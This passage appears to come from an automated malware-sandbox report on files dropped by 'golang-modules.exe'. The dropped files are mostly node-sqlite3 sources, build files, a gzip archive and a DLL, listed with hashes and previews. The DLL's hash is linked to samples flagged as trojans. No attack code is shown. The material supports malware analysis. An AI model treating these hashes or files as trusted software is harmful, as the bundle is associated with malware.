                                  SSDEEP:48:RnwwZfKrK3zU2oKHzU2dWDU24L4Sq6LdZHDQ3JD7Sx+6xPByrEieDH+hydsIbAAh:SwZyrK3zPoKHzPdWDP4L4SddZHE3JXSz
                                  MD5:0E4D1D898D697EC33A9AD8A27F0483BF
                                  SHA1:1505F707A17F35723CD268744C189D8DF47BB3A3
                                  SHA-256:8793F62B1133892BA376D18A15F552EF12B1E016F7E5DF32FFB7279B760C11BD
                                  SHA-512:C530ABA70E5555A27D547562D8B826B186540068AF9B4CCD01483EC39F083A991AC11D0CC66F40ACAA8B03D774080F227EE705A38995F356A14ABE6E5F97B545
                                  Malicious:false
                                  Preview:{. 'includes': [ 'common-sqlite.gypi' ],.. 'variables': {. 'sqlite_magic%': '',. },.. 'target_defaults': {. 'default_configuration': 'Release',. 'cflags':[. '-std=c99'. ],. 'configurations': {. 'Debug': {. 'defines': [ 'DEBUG', '_DEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 1, # static debug. },. },. },. 'Release': {. 'defines': [ 'NDEBUG' ],. 'msvs_settings': {. 'VCCLCompilerTool': {. 'RuntimeLibrary': 0, # static release. },. },. }. },. 'msvs_settings': {. 'VCCLCompilerTool': {. },. 'VCLibrarianTool': {. },. 'VCLinkerTool': {. 'GenerateDebugInformation': 'true',. },. },. 'conditions': [. ['OS == "win"', {. 'defines': [. 'WIN32'. ],. }]. ],. },.. 'targets': [. {. 'target_name': 'action_before_build',. 'type': 'none',.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):6365
                                  Entropy (8bit):4.5893883775756406
                                  Encrypted:false
                                  SSDEEP:192:QoM2Wd0WmO6pM+tPtVRhoh3hG/h1goWPQfAcCy7gPQbQwZQiR893+9dY:npM0I6aPkd/K
                                  MD5:275019A4199A84CFD18ABD0F1AE497AA
                                  SHA1:8601683F9B6206E525E4A087A7CCA40D07828FD8
                                  SHA-256:8D6B400AE7F69A80D0CDD37A968D7B9A913661FA53475E5B8DE49DDA21684973
                                  SHA-512:6422249CCD710973F15D1242A8156D98FA8BDEA820012DF669E5363C50C5D8492D21FFEFCDFA05B46C3C18033DDE30F03349E880A4943FEDA8D1EE3C00F952B0
                                  Malicious:false
                                  Preview:const path = require('path');.const sqlite3 = require('./sqlite3-binding.js');.const EventEmitter = require('events').EventEmitter;.module.exports = exports = sqlite3;..function normalizeMethod (fn) {. return function (sql) {. let errBack;. const args = Array.prototype.slice.call(arguments, 1);.. if (typeof args[args.length - 1] === 'function') {. const callback = args[args.length - 1];. errBack = function(err) {. if (err) {. callback(err);. }. };. }. const statement = new Statement(this, sql, errBack);. return fn.call(this, statement, args);. };.}..function inherits(target, source) {. for (const k in source.prototype). target.prototype[k] = source.prototype[k];.}..sqlite3.cached = {. Database: function(file, a, b) {. if (file === '' || file === ':memory:') {. // Don't cache special databases.. return new Database(fi
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):13555
                                  Entropy (8bit):5.0893763582704965
                                  Encrypted:false
                                  SSDEEP:192:uPMQUUq5MnkVw1qKQJEiyaMR00/eho92YDZLhFmW3VvGiZ+aVHiZHTQTE6KZaQiX:uPMnqvaOS1Q
                                  MD5:3E21D304AFE1783BDB88122C5563E36C
                                  SHA1:10F57A35B7D217226019DBE2278524BF3E447778
                                  SHA-256:960E50580D2F2E668EE79B0C2EF99EAF006BC9178F438C4BB4E278F80F3D8960
                                  SHA-512:A96AB73F424ABAF806CBD4C0537DC23772709753050FFAB58996435DF33E5FF1BCFEA24193B0ABBDEC1BA2E22E91D8A74CE82CB034CB6035ADE760B7D7730C33
                                  Malicious:false
                                  Preview:#include <cstring>.#include <napi.h>.#include "macros.h".#include "database.h".#include "backup.h"..using namespace node_sqlite3;..Napi::Object Backup::Init(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. // declare napi_default_method here as it is only available in Node v14.12.0+. auto napi_default_method = static_cast<napi_property_attributes>(napi_writable | napi_configurable);.. auto t = DefineClass(env, "Backup", {. InstanceMethod("step", &Backup::Step, napi_default_method),. InstanceMethod("finish", &Backup::Finish, napi_default_method),. InstanceAccessor("idle", &Backup::IdleGetter, nullptr),. InstanceAccessor("completed", &Backup::CompletedGetter, nullptr),. InstanceAccessor("failed", &Backup::FailedGetter, nullptr),. InstanceAccessor("remaining", &Backup::RemainingGetter, nullptr),. InstanceAccessor("pageCount", &Backup::PageCountGetter, nullptr),. InstanceAccessor("retryErrors", &Back
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):861
                                  Entropy (8bit):5.4548154843713075
                                  Encrypted:false
                                  SSDEEP:24:qh2OetAyTMtTlzVh7bbl9lhlRlnRlhmcXQJMyWmnmhm7:getzTMtxVh7bbl9lhlRlnRlgcXQJMyWg
                                  MD5:55A9165C6720727B6EC6CB815B026DEB
                                  SHA1:E737E117BDEFA5838834F342D2C51E8009011008
                                  SHA-256:9D4264BB1DCBEF8D927BB3A1809A01B0B89D726C217CEE99EA9CCFDC7D456B6F
                                  SHA-512:79ED80377BFB576F695F271ED5200BB975F2546110267D264F0AB917F56C26ABF6D3385878285FE3E378B254AF99B59BDB8BBCAB7427788C90A0460EB2EE5B77
                                  Malicious:false
                                  Preview:// http://web.archive.org/web/20140401031018/http://rjpower9000.wordpress.com:80/2012/04/09/fun-with-shared-libraries-version-glibc_2-14-not-found/..#if defined(__linux__)..#define _GNU_SOURCE.#include <features.h>.#undef _GNU_SOURCE..#if defined(__USE_GNU)..#if defined(__x86_64__).__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");.__asm__(".symver exp,exp@GLIBC_2.2.5");.__asm__(".symver log,log@GLIBC_2.2.5");.__asm__(".symver log2,log2@GLIBC_2.2.5");.__asm__(".symver pow,pow@GLIBC_2.2.5");.__asm__(".symver fcntl64,fcntl@GLIBC_2.2.5");.#endif..#if defined(__aarch64__) || defined(_M_ARM64).__asm__(".symver memcpy,memcpy@GLIBC_2.17");.__asm__(".symver exp,exp@GLIBC_2.17");.__asm__(".symver log,log@GLIBC_2.17");.__asm__(".symver log2,log2@GLIBC_2.17");.__asm__(".symver pow,pow@GLIBC_2.17");.__asm__(".symver fcntl64,fcntl@GLIBC_2.17");.#endif..#endif.#endif.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:Java source, ASCII text
                                  Category:dropped
                                  Size (bytes):7163
                                  Entropy (8bit):5.138163315307549
                                  Encrypted:false
                                  SSDEEP:192:UIxYINTr7I/rsKlMkZ/YNpApVYP/pVPHztXpepCrilvt6wqofIoGoQscFsMR:UyYuSgPTK6wqkNsR
                                  MD5:EF8EF3BD8E4332D3FC264F0ADF877B8D
                                  SHA1:7E4D52F5E397ED1D51DCCED24ACE9A5E00F91500
                                  SHA-256:A39DB87A3A3AA954AC3F6553B9FBFC642EB22BEF7586CC1F0559E676AA073FA8
                                  SHA-512:5E456EE839F988FED95F816278A3DA6998C8757403B98351C4BC26CA197146747B7A20E0C1A702818053547C4D9F9BCF9607BB778C88CA7CF22F21D9C9B4B091
                                  Malicious:false
                                  Preview:// Type definitions for sqlite3.// Project: http://github.com/tryghost/node-sqlite3../// <reference types="node" />..import events = require("events");..export const OPEN_READONLY: number;.export const OPEN_READWRITE: number;.export const OPEN_CREATE: number;.export const OPEN_FULLMUTEX: number;.export const OPEN_SHAREDCACHE: number;.export const OPEN_PRIVATECACHE: number;.export const OPEN_URI: number;..export const VERSION: string;.export const SOURCE_ID: string;.export const VERSION_NUMBER: number;..export const OK: number;.export const ERROR: number;.export const INTERNAL: number;.export const PERM: number;.export const ABORT: number;.export const BUSY: number;.export const LOCKED: number;.export const NOMEM: number;.export const READONLY: number;.export const INTERRUPT: number.export const IOERR: number;.export const CORRUPT: number.export const NOTFOUND: number;.export const FULL: number;.export const CANTOPEN: number;.export const PROTOCOL: number;.export const EMPTY: number;.ex
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):1892864
                                  Entropy (8bit):6.574510854408502
                                  Encrypted:false
                                  SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                  MD5:66A65322C9D362A23CF3D3F7735D5430
                                  SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                  SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                  SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe, Detection: malicious, Browse
                                  • Filename: SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe, Detection: malicious, Browse
                                  • Filename: stub.exe, Detection: malicious, Browse
                                  • Filename: stub.exe, Detection: malicious, Browse
                                  • Filename: GunManiaSetup(4).exe, Detection: malicious, Browse
                                  • Filename: GunManiaSetup(4).exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):11168
                                  Entropy (8bit):3.8120968442523697
                                  Encrypted:false
                                  SSDEEP:192:SOxrBErYr4hnxlEPTZFkGdyrKL7h7K0d06I7SFcMWFtOj5Lk8wJfbZh720J0x7YY:95ZHdFvh+84DE5o8wJfbZhKUMFAUn
                                  MD5:B60768ED9DD86A1116E3BCC95FF9387D
                                  SHA1:C057A7EEBBA8CE61E27267930A8526AB54920AA3
                                  SHA-256:C25BE1861BD8E8457300B218F5FA0BBA734F9D1F92B47D3B6AB8EE7C1862CCBE
                                  SHA-512:84E0670128F1D8712E703B6E4B684B904A8081886C9739C63B71962E5D465AC569B16CB0DB74CB41DC015A64DCC1E3A9A20B0CF7F54D4320713CC0F49E0F7363
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_MACROS_H.#define NODE_SQLITE3_SRC_MACROS_H..const char* sqlite_code_string(int code);.const char* sqlite_authorizer_string(int type);.#include <vector>..// TODO: better way to work around StringConcat?.#include <napi.h>.inline Napi::String StringConcat(Napi::Value str1, Napi::Value str2) {. return Napi::String::New(str1.Env(), str1.As<Napi::String>().Utf8Value() +. str2.As<Napi::String>().Utf8Value() );.}..// A Napi substitute IsInt32().inline bool OtherIsInt(Napi::Number source) {. double orig_val = source.DoubleValue();. double int_val = static_cast<double>(source.Int32Value());. if (orig_val == int_val) {. return true;. } else {. return false;. }.}..#define IS_FUNCTION(cb) \. !cb.IsUndefined() && cb.IsFunction()..#define REQUIRE_ARGUMENTS(n) \. if (info.Length() < (n)) { \. Napi::TypeError::New(env, "
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C++ source, ASCII text
                                  Category:dropped
                                  Size (bytes):1898
                                  Entropy (8bit):4.930561121765868
                                  Encrypted:false
                                  SSDEEP:48:hxZDjeG5pIdsijad2eLD8FlFb26iKl3/g6MeBos:hxMupLbj8FlFb26iKl3VdT
                                  MD5:E8C5E5C02D87E6AF4455FF2C59C3588B
                                  SHA1:A0DE928C621BB9A71BA9CF002E0F0726E4DB7C0E
                                  SHA-256:CCE55C56B41CB493EBD43B232FF8FFC9F5A180F5BAB2D10372ECA6780EB105F6
                                  SHA-512:ED96889E0D1D5263FB8FED7A4966905B9812C007FBB04B733CADBE84EDC7179015B9967FF5F48816FF2C97ACF4A5B4792A35CEE1F8FCE23E5FDC797F8EE0C762
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_ASYNC_H.#define NODE_SQLITE3_SRC_ASYNC_H..#include <napi.h>.#include <uv.h>..#include "threading.h"..// Generic uv_async handler..template <class Item, class Parent> class Async {. typedef void (*Callback)(Parent* parent, Item* item);..protected:. uv_async_t watcher;. NODE_SQLITE3_MUTEX_t. std::vector<Item*> data;. Callback callback;.public:. Parent* parent;..public:. Async(Parent* parent_, Callback cb_). : callback(cb_), parent(parent_) {. watcher.data = this;. NODE_SQLITE3_MUTEX_INIT. uv_loop_t *loop;. napi_get_uv_event_loop(parent_->Env(), &loop);. uv_async_init(loop, &watcher, reinterpret_cast<uv_async_cb>(listener));. }.. static void listener(uv_async_t* handle) {. auto* async = static_cast<Async*>(handle->data);. std::vector<Item*> rows;. NODE_SQLITE3_MUTEX_LOCK(&async->mutex). rows.swap(async->data);. NODE_SQLITE3_MUTEX_UNLOCK(&async->mutex). fo
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1357
                                  Entropy (8bit):4.369532219363835
                                  Encrypted:false
                                  SSDEEP:24:aXbwFF8Sg5eV71awdNDm+vl0dU6LNS0Gl9INNAO+BIynqRiMqUc0Zz:Sbw4SiS17dN7d0LLUfI0OWIynqRiMqUr
                                  MD5:E5C2DE3C74BC66D4906BB34591859A5F
                                  SHA1:37EC527D9798D43898108080506126B4146334E7
                                  SHA-256:D06CAEC6136120C6FB7EE3681B1CA949E8B634E747EA8D3080C90F35AEB7728F
                                  SHA-512:E250E53DAE618929CBF3CB2F1084A105D3A78BDFB6BB29E290F63A1FD5FBB5B2FAB934AD16BC285E245D749A90C84BDC72FDC1A77AF912B7356C18B0B197FBE5
                                  Malicious:false
                                  Preview:// Inspired by https://github.com/tlrobinson/long-stack-traces.const util = require('util');..function extendTrace(object, property, pos) {. const old = object[property];. object[property] = function() {. const error = new Error();. const name = object.constructor.name + '#' + property + '(' +. Array.prototype.slice.call(arguments).map(function(el) {. return util.inspect(el, false, 0);. }).join(', ') + ')';.. if (typeof pos === 'undefined') pos = -1;. if (pos < 0) pos += arguments.length;. const cb = arguments[pos];. if (typeof arguments[pos] === 'function') {. arguments[pos] = function replacement() {. const err = arguments[0];. if (err && err.stack && !err.__augmented) {. err.stack = filter(err).join('\n');. err.stack += '\n--> in ' + name;. err.stack += '\n' + filter(error).slice(1).join('\n');.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):388
                                  Entropy (8bit):5.099563136480987
                                  Encrypted:false
                                  SSDEEP:6:MhkY0gUk3fg7IWy8jbg8QQ8ejbg2YmtWmbggVDDWmbgUUF9Xfg9gkv:tYB3qVyA8ej1Ym4mhDKmwm99v
                                  MD5:F2A075D3101C2BF109D94F8C65B4ECB5
                                  SHA1:D48294AEC0B7AEB03CF5D56A9912E704B9E90BF6
                                  SHA-256:E0AB4F798BCCB877548B0AB0F3D98C051B36CDE240FDF424C70ACE7DAF0FFD36
                                  SHA-512:D95B5FDA6CB93874FE577439F7BD16B10EAE37B70C45AE2BD914790C1E3BA70DFB6BDA7BE79D196F2C40837D98F1005C3ED209CAB9BA346ADA9CE2ED62A87F13
                                  Malicious:false
                                  Preview:#ifndef NODE_SQLITE3_SRC_THREADING_H.#define NODE_SQLITE3_SRC_THREADING_H..#define NODE_SQLITE3_MUTEX_t uv_mutex_t mutex;.#define NODE_SQLITE3_MUTEX_INIT uv_mutex_init(&mutex);.#define NODE_SQLITE3_MUTEX_LOCK(m) uv_mutex_lock(m);.#define NODE_SQLITE3_MUTEX_UNLOCK(m) uv_mutex_unlock(m);.#define NODE_SQLITE3_MUTEX_DESTROY uv_mutex_destroy(&mutex);..#endif // NODE_SQLITE3_SRC_THREADING_H.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:gzip compressed data, from Unix, original size modulo 2^32 12625920
                                  Category:dropped
                                  Size (bytes):3204841
                                  Entropy (8bit):7.999490325438607
                                  Encrypted:true
                                  SSDEEP:49152:ZROqVtTXPm/3DfYnW3vYkidsYIzCD8BJXKU0UzHOu67Rs5q9CVxaPdWKAz:/mDsWfYkfO8JXZzHuW5qqx8h0
                                  MD5:C02F40FD4F809CED95096250ADC5764A
                                  SHA1:8398DD159F3A1FD8F1C5EDF02C687512EAAB69E4
                                  SHA-256:1C6719A148BC41CF0F2BBBE3926D7CE3F5CA09D878F1246FCC20767B175BB407
                                  SHA-512:59AD55DF15EB84430F5286DB2E5CEDDD6CA1FC207A6343546A365C0C1BAF20258E96C53D2AD48B50385608D03DE09A692AE834CB78A39D1A48CB36A05722E402
                                  Malicious:false
                                  Preview:...........[{W.....:.....B.!..c.[.8..I...1V.%...q.~...{fd..H.r..].Z...g.=.=c..0He....G....f.^.V...O.....}....O.|S.........7..Fu......H|..M...w.[......Q.../.O.P~.5x..>.....[......V..Q.*....?..... .*j.../.w2....0..(q5....c...F>.R7.E..R\,;..`.^.#...z..C..Q.n.....8.7.@o.Y...R.*j..=*....O...x.^....1.pS.Z...+3ZA..H.f...E?..r&.....7;....|.`0..G...$>O...!.W.....S.H...4...T. . ......g...bE:."..X.x./.G..@F2qCq2...':.'#%....E...|..&|..]!..'.N...Px.e"...Z..7...M.Co&uN./.......?.H.t....H1Ur8....c..v...i_4.^...n.q......(F....R0..............n.9f4..;..k....?j.zb..+......FW..vO.{...=IHI...C..p....J......Y.{).............$bg.G.L!..Y...C..u....Q.N.N.ruuU......j ..i....j".......-.i|..."..&.DN...!...MR...v...f............z(.y.%P4.e_g...3...N}....R....&......S.%48.*.F..c%.)...x..Z....{..'.t....I.Bx..e..]....p.....08.7.F.Fb.c;.d....#...N..y)E$.....VN..):.D......D(P2.ir..L.(.s....$P.C.D...P.._.l......d.`w@:...J^.\s.e.i.....P......!..a[.....4..&.#.}~...6c..A.a
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:C source, ASCII text
                                  Category:dropped
                                  Size (bytes):6119
                                  Entropy (8bit):4.884350648884472
                                  Encrypted:false
                                  SSDEEP:96:ONYHxRe61zh7H7qmZ+OmLY3jFlOo3zDTjDNhFD/nfHw8lnT3znz/PVTTzP9pbRj7:QY7e61zh7H7qXOL3jFlOo3zDTjDNhFDd
                                  MD5:7D033E9B15E4F2230D8EF59CDE708C69
                                  SHA1:9B05C5CF3F4FC9B2C20BA46420002BB48EDCEB21
                                  SHA-256:E80FAE190ACE1A5153A397AE9FE55D6D28651471FB7BEBF9BBB5528095D70F44
                                  SHA-512:0E709A8C58B73CF6D90F99CE2E0D9F2DBD8DEFE8DC8BC8919F82AB8CE66E7B4435DACB25B919E3A75030777E6A91BEB2132653424B129F12D1169E6A28AB163C
                                  Malicious:false
                                  Preview:#include <stdint.h>.#include <sstream>.#include <cstring>.#include <string>.#include <sqlite3.h>..#include "macros.h".#include "database.h".#include "statement.h".#include "backup.h"..using namespace node_sqlite3;..namespace {..Napi::Object RegisterModule(Napi::Env env, Napi::Object exports) {. Napi::HandleScope scope(env);.. Database::Init(env, exports);. Statement::Init(env, exports);. Backup::Init(env, exports);.. exports.DefineProperties({. DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READONLY, OPEN_READONLY). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_READWRITE, OPEN_READWRITE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_CREATE, OPEN_CREATE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_FULLMUTEX, OPEN_FULLMUTEX). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_URI, OPEN_URI). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_SHAREDCACHE, OPEN_SHAREDCACHE). DEFINE_CONSTANT_INTEGER(exports, SQLITE_OPEN_PRIVATECACHE, OPEN_P
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1725
                                  Entropy (8bit):4.570601989842644
                                  Encrypted:false
                                  SSDEEP:48:XnbrxZ0k0mlxe3wmTXya45ZjSjjYddQndGE6ZmdF0BW:Lrwfj3lTXya+jSjjYdqdv28
                                  MD5:B18910876AFA5BE79DC709E0B314108E
                                  SHA1:FBD12AA3A25EAA0EA9883C49282029BBB9A9B1AD
                                  SHA-256:82C0FFFCCC54EF10231BE8C7E190FEB8FEEA44EFC01B4ECFE12E4D8A0ECFB20D
                                  SHA-512:20A8EF66EC345D0F90416ACF2A288D22C3F7B44B1E1A747C5AD4C9196CBBD6CA51683650D90AFEA97F33F847C8FD5D8FD9221CE7E0A7F4494E58288F8D80BAB7
                                  Malicious:false
                                  Preview:{. "includes": [ "deps/common-sqlite.gypi" ],. "variables": {. "sqlite%":"internal",. "sqlite_libname%":"sqlite3",. "module_name": "node_sqlite3",. },. "targets": [. {. "target_name": "<(module_name)",. "cflags!": [ "-fno-exceptions" ],. "cflags_cc!": [ "-fno-exceptions" ],. "xcode_settings": { "GCC_ENABLE_CPP_EXCEPTIONS": "YES",. "CLANG_CXX_LIBRARY": "libc++",. "MACOSX_DEPLOYMENT_TARGET": "10.7",. },. "msvs_settings": {. "VCCLCompilerTool": { "ExceptionHandling": 1 },. },. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")"],. "conditions": [. ["sqlite != 'internal'", {. "include_dirs": [. "<!@(node -p \"require('node-addon-api').include\")", "<(sqlite)/include" ],. "libraries": [. "-l<(sqlite_libname)". ],. "conditions": [. [ "OS=='linux'", {"libraries+":["-Wl,-rpath=<@(sqlite)/lib
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                  Category:dropped
                                  Size (bytes):1892864
                                  Entropy (8bit):6.574510854408502
                                  Encrypted:false
                                  SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                  MD5:66A65322C9D362A23CF3D3F7735D5430
                                  SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                  SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                  SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe, Detection: malicious, Browse
                                  • Filename: SecuriteInfo.com.Trojan.Win64.Agent.14415.19839.exe, Detection: malicious, Browse
                                  • Filename: stub.exe, Detection: malicious, Browse
                                  • Filename: stub.exe, Detection: malicious, Browse
                                  • Filename: GunManiaSetup(4).exe, Detection: malicious, Browse
                                  • Filename: GunManiaSetup(4).exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1322
                                  Entropy (8bit):4.269649469997749
                                  Encrypted:false
                                  SSDEEP:24:4FzFrBZ5w7rKBFrI/3+N1+QmU2fFqySKEFI/3EBm0ZJb/0+QmU2fFqyae:4FzF1ZSrKBy/m1+zU2MySKEy/EQgq+zx
                                  MD5:0AD55AE01864DF3767D7B61678BD326E
                                  SHA1:FFEDCC19095FD54F8619F00F55074F275CEDDFD6
                                  SHA-256:4D65F2899FB54955218F28EC358A2CAD2C2074A7B43F862933C6A35E69AE0632
                                  SHA-512:AAEE895D110D67E87ED1E8ED6557B060A0575F466A947A4F59CC9D111381E1AF6AA54D432233716C78F146168D548A726FED1EAB2B3F09BB71E0AE7F4FDC69E3
                                  Malicious:false
                                  Preview:{. 'variables': {. 'sqlite_version%':'3440200',. "toolset%":'',. },. 'target_defaults': {. 'default_configuration': 'Release',. 'conditions': [. [ 'toolset!=""', {. 'msbuild_toolset':'<(toolset)'. }]. ],. 'configurations': {. 'Debug': {. 'defines!': [. 'NDEBUG'. ],. 'cflags_cc!': [. '-O3',. '-Os',. '-DNDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-O3',. '-Os',. '-DDEBUG'. ],. 'GCC_OPTIMIZATION_LEVEL': '0',. 'GCC_GENERATE_DEBUGGING_SYMBOLS': 'YES'. },. 'msvs_settings': {. 'VCCLCompilerTool': {. 'ExceptionHandling': 1, # /EHsc. }. }. },. 'Release': {. 'defines': [. 'NDEBUG'. ],. 'xcode_settings': {. 'OTHER_CPLUSPLUSFLAGS!': [. '-Os',. '-O2'. ],. 'GCC_
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):224
                                  Entropy (8bit):4.702985304607579
                                  Encrypted:false
                                  SSDEEP:3:5XFbUlycyp1wNQXkIY+lGAWMbVLWINHVY+lGAWM9wvyxXvn+LMOfr+HIdUyfFahX:5E360iGzMFNVPGzM+Ev+4OTdUyfF1w
                                  MD5:F0A82A6A6043BF87899114337C67DF6C
                                  SHA1:A906C146EB0A359742FF85C1D96A095BD0DD95FD
                                  SHA-256:5BE353D29C0FABEA29CFD34448C196DA9506009C0B20FDE55E01D4191941DD74
                                  SHA-512:D26879F890226808D9BD2644C5CA85CC339760E86B330212505706E5749464FAFAD1CB5F018C59A8F034D68D327CD3FA5234CEAC0677DE1AC9AE09039F574240
                                  Malicious:false
                                  Preview:const tar = require("tar");.const path = require("path");.const tarball = path.resolve(process.argv[2]);.const dirname = path.resolve(process.argv[3]);..tar.extract({. sync: true,. file: tarball,. cwd: dirname,.});.
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:gzip compressed data, from Unix, original size modulo 2^32 12625920
                                  Category:dropped
                                  Size (bytes):3204841
                                  Entropy (8bit):7.999490325438607
                                  Encrypted:true
                                  SSDEEP:49152:ZROqVtTXPm/3DfYnW3vYkidsYIzCD8BJXKU0UzHOu67Rs5q9CVxaPdWKAz:/mDsWfYkfO8JXZzHuW5qqx8h0
                                  MD5:C02F40FD4F809CED95096250ADC5764A
                                  SHA1:8398DD159F3A1FD8F1C5EDF02C687512EAAB69E4
                                  SHA-256:1C6719A148BC41CF0F2BBBE3926D7CE3F5CA09D878F1246FCC20767B175BB407
                                  SHA-512:59AD55DF15EB84430F5286DB2E5CEDDD6CA1FC207A6343546A365C0C1BAF20258E96C53D2AD48B50385608D03DE09A692AE834CB78A39D1A48CB36A05722E402
                                  Malicious:false
                                  Preview:...........[{W.....:.....B.!..c.[.8..I...1V.%...q.~...{fd..H.r..].Z...g.=.=c..0He....G....f.^.V...O.....}....O.|S.........7..Fu......H|..M...w.[......Q.../.O.P~.5x..>.....[......V..Q.*....?..... .*j.../.w2....0..(q5....c...F>.R7.E..R\,;..`.^.#...z..C..Q.n.....8.7.@o.Y...R.*j..=*....O...x.^....1.pS.Z...+3ZA..H.f...E?..r&.....7;....|.`0..G...$>O...!.W.....S.H...4...T. . ......g...bE:."..X.x./.G..@F2qCq2...':.'#%....E...|..&|..]!..'.N...Px.e"...Z..7...M.Co&uN./.......?.H.t....H1Ur8....c..v...i_4.^...n.q......(F....R0..............n.9f4..;..k....?j.zb..+......FW..vO.{...=IHI...C..p....J......Y.{).............$bg.G.L!..Y...C..u....Q.N.N.ruuU......j ..i....j".......-.i|..."..&.DN...!...MR...v...f............z(.y.%P4.e_g...3...N}....R....&......S.%48.*.F..c%.)...x..Z....{..'.t....I.Bx..e..]....p.....08.7.F.Fb.c;.d....#...N..y)E$.....VN..):.D......D(P2.ir..L.(.s....$P.C.D...P.._.l......d.`w@:...J^.\s.e.i.....P......!..a[.....4..&.#.}~...6c..A.a
                                  Process:C:\Users\user\Desktop\golang-modules.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):3021
                                  Entropy (8bit):4.679912791477012
                                  Encrypted:false
                                  SSDEEP:48:RnwwZfKrK3zU2oKHzU2dWDU24L4Sq6LdZHDQ3JD7Sx+6xPByrEieDH+hydsIbAAh:SwZyrK3zPoKHzPdWDP4L4SddZHE3JXSz
                                  MD5:0E4D1D898D697EC33A9AD8A27F0483BF
                                  SHA1:1505F707A17F35723CD268744C189D8DF47BB3A3
                                  SHA-256:8793F62B1133892BA376D18A15F552EF12B1E016F7E5DF32FFB7279B760C11BD
                                  SHA-512:C530ABA70E5555A27D547562D8B826B186540068AF9B4CCD01483EC39F083A991AC11D0CC66F40ACAA8B03D774080F227EE705A38995F356A14ABE6E5F97B545
                                  Malicious:false
